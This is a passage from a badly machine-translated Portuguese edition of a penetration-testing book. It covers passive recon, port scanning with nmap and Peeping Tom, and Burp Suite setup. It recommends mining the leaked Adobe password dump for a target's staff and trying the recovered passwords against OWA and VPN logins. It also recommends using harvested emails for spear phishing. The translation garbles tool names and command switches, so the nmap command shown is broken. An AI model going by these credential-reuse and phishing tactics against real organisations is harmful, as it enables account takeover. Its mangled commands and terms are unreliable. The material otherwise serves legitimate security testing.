uma. Web Developer Add­on: https://addons.mozilla.org/en­US/firefox/addon/web­developer/
b. Tamper Data: https://addons.mozilla.org/en­US/firefox/addon/tamper­data/
c. Foxy Proxy: https://addons.mozilla.org/en­US/firefox/addon/foxyproxy­standard/
d. User Agent Switcher: https://addons.mozilla.org/en­US/firefox/addon/user­agent­switcher/
O que este capítulo tentou fazer é ajudá­lo a construir uma plataforma padrão para o teste. Ferramentas será sempre
mudança, por isso é importante para manter suas plataformas de teste de up­to­date e remendado. Esperemos que este
informação será suficiente para começar e eu incluí todas as ferramentas que são utilizadas neste livro.
Se você acha que eu estou perdendo todas as ferramentas críticas, sinta­se livre para deixar comentários em
http://www.thehackerplaybook.com. Tome um completo limpa instantâneo de seu trabalho VMs e vamos começar
descobrindo e atacando redes.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 15/115
Antes de executar quaisquer peças, você tem que conhecer e analisar o seu adversário. Estudar a meta para
fraquezas e compreender o meio ambiente irá fornecer enormes retornos. Este capítulo vai demorar um
olhar para a digitalização a partir de um aspecto um pouco diferente do que os livros normais testes de penetração e deve
ser visto como um aditivo para seus processos de digitalização atuais, não como um substituto.
Se você é um testador de penetração experiente ou apenas começando no jogo, a digitalização foi provavelmente
discutida uma e outra vez. Eu não estou indo para comparar em detalhe todos os diferentes scanners de rede,
scanners de vulnerabilidade, scanners SNMP e assim por diante, mas eu vou tentar dar­lhe o processo mais eficiente para
digitalização. Esta seção será dividido em Digitalização Externo, varredura interna e Web
Digitalização aplicação.
Este é geralmente o primeiro lugar gostaria de começar. Um cliente entra em contato me para um teste e eu só pode receber uma
gama público ou, em um teste de caixa completamente preto, que você pode não saber nada sobre o seu destino. Isto é um
hora de você usar sua criatividade e experiência na tentativa de descobrir tudo sobre o seu
alvo. Nas seções seguintes, vamos usar as duas ferramentas e técnicas passivas e ativas para ser capaz de
identificar tudo sobre seus servidores de destinos, serviços e até mesmo pessoas.
Comece com Passive Discovery, que vai procurar informações sobre o destino, rede, clientes e
mais sem nunca tocar na máquina de destino. Isso é ótimo, porque ele usa recursos na Internet
sem nunca alertar o alvo de qualquer atividade suspeita. Você também pode executar todas essas look­ups antes
um compromisso para salvar­lhe uma imensa cerca de tempo. Às vezes com um pouco de Google hacking e
Shodan (http://www.shodanhq.com/) você mesmo, na verdade, encontrar vulnerabilidades antes mesmo de começar
testes, mas isso é outra história.
Olhando através de Kali, existem muitas ferramentas diferentes para rede passiva / descoberta de informações, mas
a finalidade de novo é torná­lo tão simples quanto possível. Você pode achar que você vai precisar
gastar mais tempo executar a descoberta passiva, mas aqui é a maneira rápida e simples para sair
o chão. Olhando para a imagem abaixo, podemos ver que há uma variedade de ferramentas dentro do Aberto
Fonte de Inteligência (OSINT) pasta na Kali. Passando por cada uma dessas ferramentas e aprender
para executá­los vai acabar usando muito tempo desnecessário. Felizmente, alguém colocou estes todos juntos
em uma única ferramenta.
Figura 1 ­ Ferramentas OSINT em Kali
(Previamente Scripts BackTrack) (Kali Linux)
Para resolver este problema, um quadro descoberta foi desenvolvido de forma rápida e eficiente na identificação de passivo
informações sobre uma empresa ou rede. Este quadro é através de uma ferramenta chamada Descubra­scripts
(Anteriormente chamado de BackTrack­scripts) (https://github.com/leebaird/discover) por Lee Baird. esta ferramenta
automatiza uma série de diferentes pesquisas em uma única ferramenta. Por exemplo, pode procurar as pessoas dentro dessa
organização ou domínios em todos os locais de colheita comum (por exemplo, LinkedIn), use domínio comum
ferramentas (por exemplo goofile, goog­mail, theHarvester, search_email_collector, mydnstools) e link para outros 3 rd
ferramentas de terceiros para executar a pesquisa adicional. Vamos começar.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 16/115
Figura 2 ­ Ferramenta Discover Recon
Como executar passiva Descoberta
1. cd / opt / descobrir
2. ./discover.sh
3. Digite 1 para o Domínio
4. Digite 1 para Passive
5. Digite o domínio que você deseja procurar
uma. Neste exemplo caso, foi para: reddit.com
6. Depois de terminar Tipo:
uma. firefox / root / [domain] /index.htm
Para o exemplo, eu fiz uma consulta passiva acima em um dos meus sites favoritos. Por favor, lembre­se que este é
um pedido completamente passivo e de modo algum identificar qualquer vulnerabilidade no Reddit, mas explicando
que informação pública está lá fora.
I seleccionado do domínio principal reddit.com e os exemplos que se seguem são os resultados. Após a verificação é
completo, um arquivo index.htm será criado sob a pasta raiz que contém todos os resultados da
digitalizar. Esta é uma das ferramentas mais rápidas abrangentes eu identificados para esse tipo de reconhecimento.
A ferramenta vai encontrar informações com base no domínio, IPs, arquivos, e­mails, informações WHOIS, alguns
dorks do Google, e muito mais.
Olhando para os resultados para o domínio Reddit, a página html é colocado para fora de uma forma fácil. O topo
bandeira barra tem menus suspensos em cadauma das categorias com base na informação que foi colhida. Vamos
primeiro olhar para todos os sub­domínios. Estes serão muito importante nos ataques Doppelganger em Social
seção de engenharia. Eu era capaz de coletar um grande número de sub­domínios e IPs que foram
identificada que pode estar na margem de teste.
Figura 3 ­ Subdomains para Reddit
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 17/115
No menu suspenso, podemos ver que ele também vai reunir arquivos (Google idiota pesquisa) hospedado em
seus servidores. No exemplo abaixo, olhamos para todos os arquivos PDF que foram identificadas através de parcerias público
fontes. Eu não sei quantas vezes eu usei o Google Dorks para encontrar documentos sensíveis para a
determinada empresa. Eles vão ter hospedado arquivos legados antigos mal configuradas em um servidor que não deveriam
estar público, apenas sentado em um servidor que está sendo rastreado pelos scanners.
Figura 4 ­ PDFs e­mails Encontrado Passivamente
Olhando para alguns dos outros resultados, podemos ver rapidamente todos os contatos de e­mail (acima) Pudemos
para reunir dentro do reddit. domínio com. Normalmente, eu vou usá­los para encontrar mais contatos ou usá­los para
spear phishing campanhas. Nos poucos segundos que levou para executar essa ferramenta, que já se reuniram uma tonelada de
informações sobre esta empresa.
Finalmente, eu também queria mostrar­lhe o relatório final. Este relatório conterá todas as conclusões e presente
­los em um fácil de ler maneira. Uma parte do relatório mostrado abaixo contém todos os erros de ortografia para o
domínio de sua escolha e que esses proprietários são. Estes tipos de informações de descoberta se tornará
muito importante mais tarde.
Figura 5 ­ pe Domínio
Como podemos ver a partir dos erros ortográficos domínio acima, nem todos eles parecem ser de propriedade do pai
empresa. Esta é a grande informação para o seu cliente, uma vez que poderia significar que alguém está maliciosamente
cócoras em seus domínios. Você também pode fazer isso no ponto de vista do atacante e você pode ser
capaz de comprar estes domínios para ataques de engenharia social.
Este é geralmente suficiente para a descoberta passiva para começar a fazer um teste, mas se você precisa para mergulhar mais fundo, eu
veja também usando Recon­ng. Recon­ng pode ser encontrada em https://bitbucket.org/LaNMaSteR53/recon­ng
e entra em maior profundidade em diferentes pesquisas e ferramentas automatizadas para obter passivo adicional
em formação. Se você estiver interessado, eu recomendo verificar este apresentação no Derbycon em 2013:
http://bit.ly/1kZbNcj.
Usando listas comprometidos para localizar endereços de e­mail e credenciais
A grande coisa sobre ser um testador de penetração é que você tem que ser criativo e usar todos os tipos de
recursos, como se alguém estivesse mal­intencionado. Uma tática que eu encontrei muito proveitosa nos últimos
meses está usando lixeiras credenciais conhecidas para a reutilização de senha. Deixe­me explicar um pouco mais em pormenor.
Alguns meses atrás, houve uma grande violação dos sistemas da Adobe. A informação comprometida
consistia de endereços de email, senhas criptografadas, e as suas dicas de senha. 2 A grande despejo, que
foi quase 10 gigabytes, foi lançado em particular em pequenos círculos e está agora disponível publicamente (experimente
procurando Adobe e users.tar.gz). Da perspectiva de um atacante esta é uma mina de ouro de
em formação. O que eu geralmente faço é analisar através deste arquivo e identificar os domínios que estou fazendo
um teste contra.
Claro, é importante para ver se este tipo de teste está no escopo para o seu noivado e que você
não está quebrando nenhuma lei através da obtenção de uma cópia de qualquer senha / listas comprometidos. Se for uma preta cheia
teste de caixa, este deve ser definitivamente parte da sua abordagem de ataque.
Por exemplo, na imagem abaixo, vou procurar (usando o comando grep Linux) através do Adobe
lista de senha para um domínio amostra de yahoo.com (lembre­se que você deve procurar o domínio que você está
testando a). Podemos ver que existem muitos usuários (que eu redacted) com o endereço de e­mail contendo
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 18/115
yahoo e ter uma senha e dica de senha criptografada.
Figura 6 ­ lista de contas / senhas de Adobe Breach 2013
Com base nas sugestões, você poderia fazer alguma pesquisa e descobrir quem noivo de um usuário específico é ou o
nome de seu gato, mas eu costumo ir para a tentativa rápida e suja.
Eu era capaz de encontrar dois grupos de pesquisadores que, com base em padrões e sugestões foram capazes de reverter
algumas das senhas criptografadas. Lembre­se que a partir da lista Adobe, uma vez que as senhas não são
hashes, mas senhas criptografadas, tentando reverter as senhas são muito mais difícil sem a
chave. As duas listas invertidas eu era capaz de identificar são:
http://stricture­group.com/files/adobe­top100.txt
http://web.mit.edu/zyan/Public/adobe_sanitized_passwords_with_bad_hints.txt
Eu combinei ambas as listas, limpa­los, e eu hospedá­los aqui:
https://www.securepla.net/download/foundpw.csv
Tomando esta lista, o que eu fiz foi montar um script python curta que analisa através de uma lista de
e­mail / senhas criptografadas e compara isso contra o arquivo foundpw.csv. Isto pode ser encontrado aqui:
https://securepla.net/download/password_check.txt
Fornecimento de um arquivo de texto formatado com "e­mail, senha criptografada" contra o python verificação senha_
roteiro, quaisquer jogos de senha fará com que o script para retornar uma lista de endereços de e­mail e do revertida
senhas. Claro que, os dois grupos de pesquisa não tem um grande número de palavras­passe invertidas,
mas ele deve conter os frutos mais baixos. Vamos ver isso em ação no próximo exemplo.
Figura 7 ­ costume Python Script a procurar E­mail / senhas
Eu normalmente vai levar os resultados deste produto e experimentá­lo contra a empresa Outlook Web Access
(OWA) logins ou contra logins VPN. Você pode precisar de jogar com algumas das variáveis ​​sobre a
senhas (como se eles têm 2012, você pode querer tentar de 2013) e também certificar­se você não lock­out
contas.
Eu, então, tomar o email endereços de recolher a partir destes resultados e usá­los em campanhas de spear phishing.
Lembre­se na lista Adobe, existe uma grande chance de que esses usuários estão no grupo de TI.
Possuir uma dessas contas pode ser extremamente benéfico.
É por isso que o teste de penetração é muito divertido. Você realmente não pode apenas executar ferramentas, mas você tem que usar
sua própria criatividade para dar a seu cliente o melhor e mais verdadeiro tipo de ataque que poderia receber. assim
agora você deve ter uma grande lista de faixas de IP, FQDNs, endereços de email, usuários e senhas possíveis.
Armado com esta informação, vamos embaralhar a descoberta ativa.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 19/115
Ativa descoberta é o processo de tentar identificar os sistemas, serviços e possíveis vulnerabilidades.Estamos indo para o destino os intervalos de rede especificados no escopo e digitalizá­los. Se você estiver digitalizando
a partir do interior ou os segmentos externos da rede, é importante ter as ferramentas certas para
executar a descoberta ativa.
Quero enfatizar que este livro não vai discutir em detalhes como executar um scanner, como você deve
estar familiarizado com isso. Se você nãofor, então eu recomendo que você baixar a edição comunidade de
Nexpose ou obter uma versão experimental do Nessus. Tente executá­los em uma rede doméstica ou mesmo em uma rede de laboratório
para ter uma idéia de tipos de resultados, usando varreduras autenticadas eo tipo de tráfego gerado em um
rede. Estes scanners irão acionar IDS / IPS alerta em uma rede com muita frequência como eles são
extremamente alto. Agora que estamos prontos, vamos entrar em alguns dos maiores detalhes aqui.
Nesta seção, descrevo o processo que eu gosto de usar para fazer a varredura de uma rede. Vou usar várias ferramentas,
processos e técnicas para tentar fornecer varrimento eficiente e eficaz. Meus processos de digitalização
será algo parecido com isto:
Digitalizar utilizando Nexpose / Nessus
Digitalização com Nmap
Digitalização com Nmap personalizado
Captura de tela com PeepingTom
Rede de Vulnerabilidade (Nexpose / Nessus)
Tão alto quanto estas ferramentas pode ser, esta é a maneira mais eficaz e eficiente para iniciar um teste. Eu gosto de chutar
off um deles (se não ambos) scanners com cheques seguras depois de eu ter certeza que eu tê­los configurado
devidamente. Se o tempo é uma grande preocupação, eu vou realmente executar um perfil primeiro a olhar para o único conhecido exploráveis
vulnerabilidades e uma segunda verificação com o perfil padrão. Desta forma, a primeira varredura será concluída em um
fração do tempo e contêm conclusões exclusivamente críticos.
Deixe­me oferecer uma sinopse rápida sobre scanners de vulnerabilidade. Na fase de instalação, discuti a idéia de
compra Nexpose ou Nessus scanners. Há sempre uma grande guerra sobre a qual um dos scanners
é melhor e eu ofereço esta advertência: eu usei a maioria dos scanners comerciais e nunca ter encontrado
um para ser perfeito ou a solução certa. Ao comparar essas ferramentas, eu descobri que há sempre
achados que são encontrados e perdidas por certas ferramentas. A melhor idéia seria a de executar várias ferramentas, mas
isso nem sempre é a solução mais financeiramente aceitável.
Meus rápidas dois centavos é que se você estiver indo para comprar uma única licença, eu recomendaria começar
Nessus Vulnerability Scanner da Tenable. Para o número de IPs pode digitalizar e o custo (US $ 1.500), ele
é a mais razoável. Eu descobri que uma única licença consultor de Nexpose é o dobro do preço e
limitado no número de IPs para digitalizar, mas eu pedir­lhe para verificar, porque você nunca sabe que os preços
pode mudar.
Aqui está um exemplo rápido de por que você pode querer olhar para várias ferramentas. A seguir varredura é de
a versão profissional do Nexpose contra o meu site. O perfil Corri era apenas um padrão
verificação de vulnerabilidade, sem verificações de aplicações web intensiva. Os resultados vieram de volta com 4 grave
achados e dar uma olhada na imagem abaixo para ver os detalhes.
Figura 8 ­ Resultados de Nexpose digitalização da Rapid7
No segundo exemplo, eu corri o scanner profissional Tenable Nessus com um perfil semelhante eo
os resultados foram muito diferentes. Lembre­se que esta é apenas uma varredura contra o meu servidor web e este é um muito
pequena amostra. Em scans maiores, eu vi os resultados para ser muito mais perto que esses resultados. Se olharmos para
a imagem abaixo, o Nessus voltou com 3 resultados médios e 5 resultados baixos.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 20/115
Figura 9 ­ Resultados de digitalização Tenable Nessus '
Só de olhar para estes dois exemplos, podemos identificar que eles têm resultados diferentes. Em uma rápida
olha, o único achado que eu seria mais provável começar a expandir é o vazamento caminho Wordpress
vulnerabilidade identificada apenas por Nexpose e não Nessus.
Embora scanners são muito úteis e praticamente um requisito ao executar penetração da rede
testes, você precisa entender os seus benefícios e suas limitações.
Nmap ­ bandeira agarrando
Antes de eu entrar no banner seção de agarrar, eu costumo executar um personalizado Nmap OS e serviço
detecção de varredura em portas comuns (ou todas as 65.535 portas se eu tiver tempo suficiente). Além de regular
Nmap, eu vou executar o script bandeira agarrando, que vou descrever abaixo.
O único problema, que eu tenho com scanners de vulnerabilidade completos, é que eles são extremamente tempo
consumir. Para complementar o scanner de vulnerabilidade, eu executar um script Nmap rápido para escanear as portas e para
pegar informações básicas que vai me ajudar a organizar o meu plano de ataque.
Minha esperança é que você já tenha usado Nmap e que você entenda exatamente o que ele faz. Para mim
Nmap é rápido, eficiente, módulo de base, e faz o trabalho. Eu recomendo a leitura do livro Nmap de Fydor
(Http://www.amazon.com/Nmap­Network­Scanning­Official­Discovery/dp/0979958717), mas o foco
é descobrir rapidamente todas as diferentes hosts e serviços em execução. O que é mais útil para mim é correr
Nmap contra todas as 65535 portas para ver se essas portas são abertas e pegar informações banner.
Eu também vou usar este mesmo processo para comparar e diff antiga varreduras de rede contra novas varreduras para identificar
alterações em um ambiente. Alguns dos meus clientes me pedem para executar varreduras mensais e este é um muito rápido
e maneira fácil de identificar essas mudanças (um pouco scripting é requerido).
Desde a fase de instalação, instalamos banner­plus.nse de HD Moore. Este é o mesmo roteiro que ele usou
durante o seu mapeamento de toda a Internet 3 . Ele fornece uma maneira muito rápida para identificar a página bandeira do
a porta aberta. O comando para executar a verificação seria algo parecido com isto:
nmap ­script / usr / share / nmap / scripts / banner­plus.nse­rate­min = 400­min­paralelismo = 512 ­p1­
65535 ­n pn ­PS ­oA / opt / peepingtom / report <IP CIDR>
Alternar List:
­script = local do script bandeira­plus que baixado na área de configuração
­Rate­min = garantia de que uma varredura será concluída por um determinado período de tempo
­min­paralelismo = acelerar o número total de sondas
­p1­65535 = verificar todos os 65k portos
­n = desativar a resolução de DNS (ajuda a scans de velocidade)
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 21/115
Pn = desativar Ping (um monte de servidores terá de ping desativada na rede externa)
­PS = TCP SYNPing
­oA = exportar todos os tipos de relatórios
Você pode brincar com as ­Min­taxas e Min­paralelismos e encontrar a melhor vs. desempenho
confiabilidade para sua rede (mais informações podem ser encontradas em http://nmap.org/book/man­
performance.html). O que eu tenho feito com este dados é para criar um fácil vista para olhar a serviços,
versões vulneráveis ​​e problemas exclusivos. O resultado Nmap irá imprimir a saída em todos os formatos diferentes
localizado no diretório / pasta / opt / peepingtom. Vamos dar uma olhada nesses arquivos em um segundo na captura de tela
seção, mas eu queria demonstrar como também utilizar estes dados.
Na próxima seção, eu queria dar­lhe um exemplo de como você pode levar os dados de banner e rapidamente
pesquisar todos os seus resultados de varredura. Eu criei um banco de dados back­end MongoDB (para fins de velocidade) e
PHP usado como interface. Para enviar dados para o banco de dados, um script python rápida foi criada para analisar o XML
arquivo do Nmap. Eu, então, criou uma página PHP para consultar esses dados. Desde que eu estava examinando inúmeras / 16
redes, eu precisava de uma maneira rápida para identificar páginas de faixa únicas que possam ser de interesse para mim.
Idealmente, se eu tiver tempo euvou ter uma versão avaliável publicamente desta aplicação onde você pode carregar
seu próprio arquivo xml e ver os resultados.
Então eu construí o que eu agora chamo a aplicação internet­scan. Esta aplicação pode consultar rapidamente ao certo
banners, portos e IPs. O que é mais útil é a consulta de páginas de identificação de sistemas vulneráveis. Vocês
Pode­se argumentar que as páginas de faixa pode mentir, mas para a maioria dos meus testes de penetração, eu descobri que é raro
para ver isso. A imagem abaixo é a página inicial do Internet­scan.
Figura 10 ­ Portal personalizado para analisar Nmap bandeira Script
Eu, então, tomar cada resultado bandeira e fazer verificações de expressões regulares rápidas de ataques que eu poderia
estar procurando. Vou ordenar os resultados de banner em um par de maneiras diferentes. Por exemplo, aqui estão os
banners interessantes que eu poderia querer cavar mais fundo de uma varredura / 16:
Figura 11 ­ Script de análise para Banners interessantes
Imediatamente eu era capaz de identificar banners que podem ser sistemas que querem passar algum tempo adicional em ou
hosts que já poderia ser comprometida. Hm ... páginas de faixa com a palavra SCADA pode ser realmente
interessante como eles poderiam apontar para informações rede elétrica ... Ou o que dizer de terminal? Deixa­me dizer
você que aqueles que me cair em conchas não privilegiados em vários dispositivos de rede.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 22/115
Eu também tenho consultas pré­criados para certos tipos de sistemas operacionais, versões de aplicativos ou outros
informações que possam rapidamente permitir­me para avaliar um grande ambiente. Por exemplo, eu fiz uma rápida
expressão regular para páginas de faixa tipo IIS e os resultados estão abaixo.
Figura 12 ­ Puxando Fora IIS versão Banners
A velocidade de banners apenas pegar de todos os 65k portos ea velocidade de utilização de Internet de digitalização para
rapidamente analisar através desses banners me salvou um imenso respeito do tempo.
Captura de tela ­ Peeping Tom
Voltando ao lidar com os nossos resultados de varredura do Nmap. Como um testador de penetração, o problema com a digitalização
grandes cadeias está a organizar os dados e identificar quais fruta de suspensão baixa que você quer atacar primeiro.
Você pode identificar que existem mais de 100 sites dentro de um intervalo e visitar manualmente­los torna­se
tanto demorado e pode não resultar em qualquer tipo de vulnerabilidade. Muitas vezes, a maioria dos web
páginas do aplicativo são bastante inútil e pode ser facilmente removido da revisão manual. Peeping Tom é
uma ferramenta que irá processar uma entrada de IPs e portos, tirar um screenshot de toda HTTP (s) de serviços, e presente
­lo em um formato fácil de ler.
Isto significa que você vai ser capaz de puxar para cima uma página HTML e visualizar rapidamente quais sites têm um maior
probabilidade de conter uma vulnerabilidade ou páginas que você sabe que quer passar mais tempo em.
Lembre­se que durante um teste é muitas vezes trata­se de tempo como as janelas de teste pode ser muito pequena.
Antes de podermos lançar Peeping Tom, precisamos preparar e limpar os dados para raspagem. É um Gnmap.pl
pequeno script Perl que terá os resultados do Nmap antes e limpá­lo a uma lista de IPs. 4 Podemos fazer
isso, os comandos a seguir.
cd / opt / peepingtom /
report.gnmap gato | ./gnmap.pl | grep http | cortar ­f 1,2 ­d "," | tr "," ":"> http_ips.txt
A saída será um arquivo chamado http_ips.txt com uma lista completa de IPs que executam serviços HTTP. Podemos agora
alimentar isso em Peeping Tom para começar a grilagem de tela. Para executar Peeping Tom:
python ./peepingtom.py ­p ­i http_ips.txt
O exemplo abaixo demonstra a execução da ferramenta contra uma saída de nossa varredura Nmap anterior.
Note­se que alguns serviços HTTP não pode ser capturado e terá de ser visitada manualmente.
python ./peepingtom.py ­h
Uso: peepingtom.py [opções]
peepingtom.py ­ Tim Tomes (@ LaNMaSteR53) (www.lanmaster53.com)
opções:
número da versão do programa ­version show e saída
­h, ­­help mostrar esta mensagem de ajuda e sai
­v Ativar o modo detalhado.
modo de entrada INFILE arquivo ­i. Nome do arquivo de entrada. [IP: PORT]
URL ­u modo de entrada única URL. URL como uma string.
­q PyQt4 modo de captura. módulos PyQt4 python necessário.
­p modo de captura Phantonjs. PhantomJS necessária.
python ./peepingtom.py ­p ­i http_ips.txt
[*] O armazenamento de dados em '131229_230336 /'
[*] Http://192.168.58.20 200. Boa.
[*] Https://192.168.58.20 200. Boa.
[*] Http://192.168.58.21 403. Boa.
[*] Https://192.168.58.21 <Conexão recusada>. Visite manualmente a partir do relatório.
[*] Http://192.168.58.25 <No route to host>. Visite manualmente a partir do relatório.
[*] Https://192.168.58.25 <No route to host>. Visite manualmente a partir de relatório
[*] Http://192.168.58.35 <Conexão recusada>. Visite manualmente a partir do relatório.
[*] Http://192.168.58.48 200. Boa.
[*] Https://192.168.58.48 200. Boa.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 23/115
Uma vez que Peeping Tom é terminar a execução, uma nova pasta será criada e nomeada com base em uma data
timestamp na pasta peepingtom. Dentro desta pasta será todas as imagens e um arquivo report.html.
Abrindo o arquivo report.html com um navegador, você será capaz de identificar rapidamente quais páginas são mais
útil e quais as páginas que não rende. Vamos dar uma rápida olhada nos resultados de nossa análise.
Figura 13 ­ Peeping Tom Output
Dentro do relatório, notamos um monte de diferentes telas. Ele irá exibir o instantâneo da página da Web
com informações sobre as respostas do servidor, data, e HTTP. Imagem se você tivesse um teste 100+
servidores web. Isso fará com que sua vida muito mais fácil de ser capaz de analisar através de todos os sites em um
poucos minutos.
Então, o que você está realmente procurando? Bem, isso é onde a experiência realmente vale a pena, pois há não é um direito
responder, mas aqui está o que geralmente se destaca para mim:
Apache Tomcat
JBoss
Fusão a frio
WordPress
Joomla
Beta / locais DEV
Páginas que exigem autenticação
Padrão de redes para aparelhos Páginas
Content Management Systems
wikis
Páginas com mensagens de direitos autorais <2012
A página VOIP
A razão de eu ir atrás desses sites é porque eles geralmente resultam em sistemas comprometidos ou acesso a
dados. Há também um monte de vulnerabilidades conhecidas para o Apache, JBoss, e Cold Fusion, onde exploram
código está facilmente disponível.
Alguns exemplos:
Cold Fusion Exemplo: http://www.exploit­db.com/exploits/25305/
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 24/115
JBoss Exemplo: http://www.rapid7.com/db/modules/exploit/multi/http/jboss_maindeployer
Apache Exemplo: http://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_deploy
Uma razão adicional que olhar para os sites que exigem autenticação é porque eles geralmente dizem­me que
a aplicação tem uma funcionalidade adicional e tem uma melhor chance de revelar problemas de aplicativos web
ou senhas padrão.
Isso deve lhe dar um grande começo para identificar rapidamente as vulnerabilidades e obter uma compreensão da
rede que você está testando. Este não é um guia completo para a digitalização em rede, mas o que eu encontrei
para fazer para a digitalização mais eficiente e mais rápido.
Depois que eu começar os scanners de rede eobter um layout com Peeping Tom, eu ir diretamente para iniciar o meu
scanners de aplicações web. Na varredura web, vou concentrar­se, principalmente, uma ferramenta. Há muitos
open source / ferramentas gratuitas para usar, como ZAP, WebScarab, Nikto, w3af, etc, que são todos bons, mas novamente I
estou indo para a maneira mais rápida, mais eficiente para realizar um teste. Embora o arroto Suite Pro
(Http://portswigger.net/burp/) é uma ferramenta paga, custa apenas cerca de US $ 300. Isso vale bem a pena o custo, uma vez que
é mantido ativamente, muitos pesquisadores de segurança desenvolver extensões para o arroto, e tem um monte de
capacidades para testes manuais.
Semelhante à discussão de scanners de vulnerabilidade, isso não vai ser um guia completo para
realizar testes de penetração de aplicativos web, mas mais do que é realizado durante uma rede
teste de penetração. Se você quer se concentrar em testar uma única aplicação a fundo, você vai querer
a olhar para ambos análise de código fonte (usando algo como HP Fortify) e em profundidade aplicação
teste (um grande recurso para este é um livro chamado The Web Aplicação de Hacker Handbook: Finding
e falhas explorando Segurança ). Vamos mergulhar em como a forma eficiente usar Burp Suite.
Nesta seção eu descrevo como eu uso Burp Suite Pro para digitalizar aplicações web durante uma rede
teste de penetração. Normalmente, eu não vou ter tempo suficiente durante uma caneta­teste de rede para fazer um web completo
teste de aplicação, mas estes são os passos que dou quando eu identificar aplicações maiores.
Aranha / descoberta / Digitalização com Burp Pro
A digitalização com um scanner de aplicação web
injeção de parâmetro Manual
análise de token de sessão
Depois de executar uma ferramenta como o Nessus ou Nexpose para encontrar a / aplicativo / serviço sistema comum
vulnerabilidades, é hora de cavar o aplicativo. Eu vou descrever como usar o arroto Suite e obter
você começar a olhar mais fundo na aplicação. Os passos seguintes vão fazer isso:
1) configurar o proxy de rede
2) Ative arroto Suite
3) aranha por meio da aplicação
4) Discover conteúdo
5) Execute o Scanner Ativo
6) Exploit
Configurar o Proxy de rede e navegador
Lembre­se que como a ferramenta arroto Suite funciona é configurar seu navegador para falar através do
Arrotar Suite e, em seguida, para o aplicativo (s) web. Isto lhe dará visibilidade total nos pedidos feitos pelos
o navegador e também dar­lhe a capacidade de modificar as solicitações de matérias­independentemente do lado do cliente
proteções.
Em primeiro lugar, você vai querer começar arroto Suite executando o arquivo JAR em ambos o Windows ou Kali
sistema. Depois de ter Burp instalado e funcionando, você quer ter certeza de seu proxy é habilitado e
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 25/115
escutando na porta 8080. Vá para a aba Proxy no arroto, para Opções, e certifique­se de que Burp está em execução. isto
Não importa qual porta de interface que você usa, mas que, se você alterá­lo a partir do padrão, certifique­se de
mudá­lo na configuração do seu browser.
Figura 14 ­ Ativação arroto Suite
Agora, é preciso configurar seu navegador para que ele possa usar a porta que tínhamos Burp Proxy escuta
em. O add­on que eu uso é chamado Foxy Proxy para o Firefox (https://addons.mozilla.org/en­
US / firefox / addon / FoxyProxy­standard /) e que deve ter sido instalado em a configuração de fase. É um
maneira fácil de ter vários proxies e ser capaz de mudar entre eles rapidamente. Mesmo ao lado do
barra de URL do navegador, há uma raposa com um círculo e uma linha através dele. Clique na raposa, clique em "Adicionar Novo
Proxy ", clique na guia Detalhes Proxy, e você vai precisar para definir a Configuração manual do proxy para o local,
host (127.0.0.1) e a porta do proxy de 8080. Volte para a guia Geral, dar esse proxy um nome e
salvar essa configuração.
O que você essencialmente feito é contada seu navegador para enviar todo o tráfego para o seu host local para a porta
8080. Esta é a porta que já configurou o Application Suite Burp para escutar. Arroto sabe que ele vai
tomar este tráfego e proxy­lo para o Internet.
Figura 15 ­ Definindo as configurações de proxy do Brower
Desde que você salvou este perfil, clique direito sobre a raposa e cair para baixo e selecione o seu proxy
configuração. Neste caso, eu nomeei minha configuração de proxy Burp Suite e selecionado que como meu proxy.
Figura 16 ­ Selecionando o Proxy para Utilize
Uma vez que temos o nosso navegador usando o proxy, podemos navegar para a aplicação web, identificamos anteriormente.
Neste exemplo, no meu navegador eu estou indo para ir ao meu site: . Www.securepla.net Se voltarmos para arrotar,
nós estamos indo para ver o Proxy / Intercept luz guia para cima.
Figura 17 ­ Captura arroto e interceptar o tráfego
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 26/115
Se você ver isso acontecer, sabemos que você configurou tudo perfeitamente. Vemos agora que Burp
com sucesso capturou o pedido GET para o meu site. Nós também podemos ver os cookies e outro pedido
